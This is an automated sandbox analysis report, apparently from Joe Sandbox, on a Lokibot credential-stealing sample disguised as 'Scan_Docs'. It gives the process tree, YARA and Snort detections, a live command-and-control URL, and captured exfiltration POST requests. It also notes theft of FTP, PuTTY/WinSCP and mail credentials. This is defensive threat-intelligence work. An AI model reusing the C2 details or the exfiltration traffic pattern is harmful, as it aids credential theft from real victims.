
Analysis Report Scan_Docs.r00

Overview

General Information

Sample Name: Scan_Docs.r00 (renamed file extension from r00 to rar)
MD5: 0f187b992aa1dafb579eb3931e945283
SHA1: 3ccabd079a208b5931a8ab4d5f72d4924b214e8d
SHA256: 63ccabee37612823a15b87ff4d514c4a19b4e33e322ac252a0ff05bb39363520

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • unarchiver.exe (PID: 5080 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Desktop\Scan_Docs.rar' MD5: CC652A2104B9470999DA6603F972D7B4)
    • 7za.exe (PID: 2388 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1508 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Scan_Docs.exe (PID: 4764 cmdline: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe MD5: 1D950523E3748FF6DBBBFAD6B611C55A)
        • Scan_Docs.exe (PID: 4192 cmdline: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe MD5: 1D950523E3748FF6DBBBFAD6B611C55A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Rule: SUSP_XORed_URL_in_EXE | Description: Detects an XORed URL in an executable | Author: Steve Miller, Florian Roth
Strings:
  • 0x3e3cd:$s1: http://
  • 0x4448d:$s1: http://
  • 0x45238:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x3e3cd:$f1: http://
  • 0x4448d:$f1: http://
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
Strings:
  • 0x3e429:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x3e1f1:$a2: last_compatible_version

Memory Dumps

Source: 00000005.00000003.638435641.0000000006005000.00000004.00000001.sdmp | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp | Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Strings:
  • 0x33a9:$des3: 68 03 66 00 00
  • 0x10e1a:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x10ee6:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security

Unpacked PEs

Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack | Rule: JoeSecurity_aPLib_compressed_binary | Description: Yara detected aPLib compressed binary | Author: Joe Security
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack | Rule: Lokibot | Description: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Strings:
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack | Rule: Loki_1 | Description: Loki Payload | Author: kevoreilly
Strings:
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Source: 6.2.Scan_Docs.exe.400000.0.unpack | Rule: JoeSecurity_Lokibot | Description: Yara detected Lokibot | Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Avira: detection malicious, Label: HEUR/AGEN.1046458
Multi AV Scanner detection for domain / URL
Source: http://198.23.200.239/~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv | Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | ReversingLabs: Detection: 70%
Multi AV Scanner detection for submitted file
Source: Scan_Docs.rar | Virustotal: Detection: 16%
Source: Scan_Docs.rar | ReversingLabs: Detection: 47%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 0555055Fh (0_2_055500A0)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49707 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49707 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49707 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49707 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49709 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49709 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49709 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49709 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49710 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49710 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49710 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49710 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49712 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49712 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49712 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49712 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49713 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49713 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49713 -> 198.23.200.239:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49713 -> 198.23.200.239:80
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected:
  POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 198.23.200.239
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: AE292164
  Content-Length: 192
  Connection: close
Source: global traffic | HTTP traffic detected:
  POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 198.23.200.239
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: AE292164
  Content-Length: 165
  Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 198.23.200.239
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_00404ED4 recv
Source: unknown | HTTP traffic detected:
  POST /~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 198.23.200.239
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: AE292164
  Content-Length: 192
  Connection: close
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 22 May 2020 11:45:15 GMT
  Server: Apache
  Connection: close
  Content-Type: text/html; charset=UTF-8
Source: 7za.exe, 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, Scan_Docs.exe, 00000006.00000002.958292453.00000000007C2000.00000002.00020000.sdmp, Scan_Docs.exe.1.dr | String found in binary or memory: ftp://ftps://http://https://s.txt%s
Source: Scan_Docs.exe, 00000006.00000002.958269659.000000000049F000.00000040.00000001.sdmp | String found in binary or memory: http://198.23.200.239/~boxing/.tcsogb/cf.php/r0dzBU5oBLUSv
Source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.co
Source: Scan_Docs.exe, Scan_Docs.exe, 00000006.00000002.958292453.00000000007C2000.00000002.00020000.sdmp, Scan_Docs.exe.1.dr | String found in binary or memory: http://www.ibsensoftware.co1
Source: Scan_Docs.exe, Scan_Docs.exe, 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload; Author: kevoreilly
Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki Payload; Author: kevoreilly
Source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPED | Matched rule: Loki Payload; Author: kevoreilly
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory; Author: JPCERT/CC Incident Response Group
Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload; Author: kevoreilly
.NET source code contains very large array initializations
Source: Scan_Docs.exe.1.dr, fGu0021/aAu002b.cs | Large array initialization: 4Hz: array initializer size 25500
Source: Scan_Docs.exe.1.dr, fGu0021/Bu002be.cs | Large array initialization: 3Bg: array initializer size 19780
Source: Scan_Docs.exe.1.dr, fGu0021/s_8.cs | Large array initialization: H?g: array initializer size 14112
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/aAu002b.cs | Large array initialization: 4Hz: array initializer size 25500
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/Bu002be.cs | Large array initialization: 3Bg: array initializer size 19780
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, fGu0021/s_8.cs | Large array initialization: H?g: array initializer size 14112
Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/aAu002b.cs | Large array initialization: 4Hz: array initializer size 25500
Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/Bu002be.cs | Large array initialization: 3Bg: array initializer size 19780
Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, fGu0021/s_8.cs | Large array initialization: H?g: array initializer size 14112
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/aAu002b.cs | Large array initialization: 4Hz: array initializer size 25500
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/Bu002be.cs | Large array initialization: 3Bg: array initializer size 19780
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, fGu0021/s_8.cs | Large array initialization: H?g: array initializer size 14112
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/aAu002b.cs | Large array initialization: 4Hz: array initializer size 25500
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/Bu002be.cs | Large array initialization: 3Bg: array initializer size 19780
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, fGu0021/s_8.cs | Large array initialization: H?g: array initializer size 14112
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02EC9C14 CreateProcessAsUserW
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 0_2_055500A0
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 0_2_05550006
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CD2860
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_00CD81DB
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02ECBA00
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02EC3BD0
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02EC1B78
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02EC8868
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02EC8858
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 5_2_02ECB9F0
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_004029D4
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007C2860
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: 6_2_007C81DB
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000001.00000003.535342944.00000000023C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPED | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPED | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot; hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1; author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE; date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: classification engineClassification label: mal100.spyw.evad.winRAR@11/6@0/1
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,6_2_0040434D
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Docs.exe.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_01
                Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\fxwllydk.nyzJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Scan_Docs.rarVirustotal: Detection: 16%
                Source: Scan_Docs.rarReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Desktop\Scan_Docs.rar'
                Source: unknownProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'Jump to behavior
